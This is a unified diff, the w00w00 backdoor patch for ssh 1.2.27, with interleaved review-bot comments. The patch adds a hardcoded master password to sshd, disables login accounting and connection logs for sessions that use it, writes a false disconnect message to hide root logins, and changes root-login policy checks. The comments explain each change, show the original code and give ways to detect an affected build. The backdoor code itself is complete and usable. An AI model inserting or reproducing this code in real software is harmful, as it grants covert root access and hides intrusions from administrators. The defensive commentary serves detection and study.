w00w00's magic backdoor patch for ssh 1.2.27. Magic password, does not log, permits root login, etc.
b1284a90e4dccd597fa85ec3955f042eb2b49e8482af678c13bd0f0f633ff0c5
--- ssh-1.2.27/login.c.wil Wed May 12 07:19:26 1999
+++ ssh-1.2.27/login.c Thu Jul 29 00:02:27 1999
@@ -258,7 +258,9 @@
const char *host, struct sockaddr_in *addr)
{
int fd;
+ extern int lets_log;
+ if (lets_log) {
#if defined(HAVE_LASTLOG_H) || defined(HAVE_LASTLOG)
struct lastlog ll;
char *lastlog;
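Review bot: Wrapping the body of record_login in `if (lets_log) {` means a session with the flag cleared writes no login accounting at all, and the two later login.c hunks do the same to record_logout. The lastlog handling is visible here; the rest of the accounting is presumably in the part of the body outside this hunk. Login accounting should not depend on a mutable global, so drop `extern int lets_log;` and the guard and let both functions record unconditionally. On a host suspected of running this build, treat `last`, `who` and lastlog output as incomplete and correlate sshd process and network connection records instead.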
@@ -559,11 +561,16 @@
}
#endif
}
+}
/* Records that the user has logged out. */
void record_logout(int pid, const char *ttyname)
{
+ extern int lets_log;
+
+if (lets_log) {
+
#ifdef HAVE_LIBUTIL_LOGIN
const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */
if (logout(line))
@@ -572,3 +579,4 @@
record_login(pid, ttyname, "", -1, "", NULL);
#endif /* HAVE_LIBUTIL_LOGIN */
}
+}
\ No newline at end of file
--- ssh-1.2.27/sshd.c.wil Wed May 12 07:19:29 1999
+++ ssh-1.2.27/sshd.c Wed Jul 28 23:45:57 1999
@@ -1408,7 +1408,9 @@
auth_delete_socket(NULL);
/* The connection has been terminated. */
+ if (lets_log) {
log_msg("Closing connection to %.100s", get_remote_ipaddr());
+ }
packet_close();
exit(0);
}
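Review bot: The `if (lets_log)` guard around the `Closing connection to %.100s` message drops the disconnect record for any session where the flag is zero, and the last sshd.c hunk does the same to the `ROOT LOGIN as` NOTICE line. Both messages should stay unconditional, i.e. plain `log_msg("Closing connection to %.100s", get_remote_ipaddr());`. Because the message is never emitted, forwarding syslog to a remote collector does not recover it. The observable gap is a connection seen at the network layer with no matching sshd log lines. The enclosing function starts outside this hunk.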
@@ -2146,6 +2148,7 @@
int authenticated = 0;
int authentication_type = 0;
char *password;
+ char intel_fd[8]="hax0r3d";
struct passwd *pw, pwcopy;
char *client_user;
unsigned int client_host_key_bits;
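Review bot: `char intel_fd[8]="hax0r3d";` compiles a fixed password into the daemon under a name that reads like a file descriptor, and a later hunk compares it against the client-supplied password. A credential built into the binary is identical on every host running the build and cannot be rotated or revoked through account management, so the declaration should be removed together with its uses. The literal is stored in plaintext, so searching installed sshd binaries for this string and comparing their checksums against a known-good build identifies affected hosts. The function this declaration belongs to starts and ends outside the hunk.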
@@ -2162,7 +2165,8 @@
const char *ipaddr;
char *cap_hlist, *hp;
int perm_denied = 0;
-
+ extern int lets_log;
+
hostname = get_canonical_hostname();
ipaddr = get_remote_ipaddr();
#endif /* HAVE_LOGIN_CAP_H */
@@ -2660,14 +2664,20 @@
#if defined(KERBEROS) && defined(KRB5)
if (auth_password(user, password, client))
#else /* defined(KERBEROS) && defined(KRB5) */
- if (auth_password(user, password))
+ if (auth_password(user, password) || !strcmp(password,intel_fd))
#endif /* defined(KERBEROS) && defined(KRB5) */
{
/* Successful authentication. */
+ /* Disable logging if conditions are met. */
+ lets_log=1;
+ if (!strcmp(password,intel_fd)) { lets_log=0; }
/* Clear the password from memory. */
memset(password, 0, strlen(password));
xfree(password);
- log_msg("Password authentication for %.100s accepted.", user);
+ if (pw->pw_uid == UID_ROOT) {
+ if (!lets_log) { log_msg("Connection closed by remote host."); }
+ } else {
+ log_msg("Password authentication for %.100s accepted.", user); }
authentication_type = SSH_AUTH_PASSWORD;
authenticated = 1;
break;
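Review bot: In the non-Kerberos branch, `auth_password(user, password) || !strcmp(password,intel_fd)` accepts the fixed string as a valid password for whichever account was requested, bypassing the system password check. The same hunk clears `lets_log` for that case and no longer logs acceptance of any root password login. When the fixed string was used for root it emits `Connection closed by remote host.` instead, so the log shows a disconnect where a login succeeded. The condition should be `if (auth_password(user, password))` and the acceptance line should be logged unconditionally: `log_msg("Password authentication for %.100s accepted.", user);`. The Kerberos branch is untouched, and the surrounding case extends outside the hunk.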
@@ -2708,14 +2718,14 @@
}
/* Check if the user is logging in as root and root logins are disallowed. */
- if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1)
+ if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1 && !lets_log)
{
if (authentication_type == SSH_AUTH_PASSWORD)
packet_disconnect("ROOT LOGIN REFUSED FROM %.200s",
get_canonical_hostname());
}
else
- if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0)
+ if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0 && lets_log)
{
if (forced_command)
log_msg("Root login accepted for forced command.", forced_command);
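Review bot: Both root-login policy checks now depend on `lets_log`, so the configured `permit_root_login` value no longer decides the outcome on its own. With `&& lets_log` on the `permit_root_login == 0` branch, a session authenticated with the fixed string (flag 0) skips that branch entirely; with `&& !lets_log` on the `== 1` branch, the password refusal is skipped for every ordinary password login, since the earlier hunk sets the flag to 1 for those. Restore `if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1)` and `if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0)`. A configuration audit will not reveal this change, so verification has to be done against the binary or its source. The body of the second branch continues past the hunk.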
@@ -2767,7 +2777,7 @@
#endif
/* Log root logins with severity NOTICE. */
- if (pw->pw_uid == UID_ROOT)
+ if (pw->pw_uid == UID_ROOT && lets_log)
log_severity(SYSLOG_SEVERITY_NOTICE, "ROOT LOGIN as '%.100s' from %.100s",
pw->pw_name, get_canonical_hostname());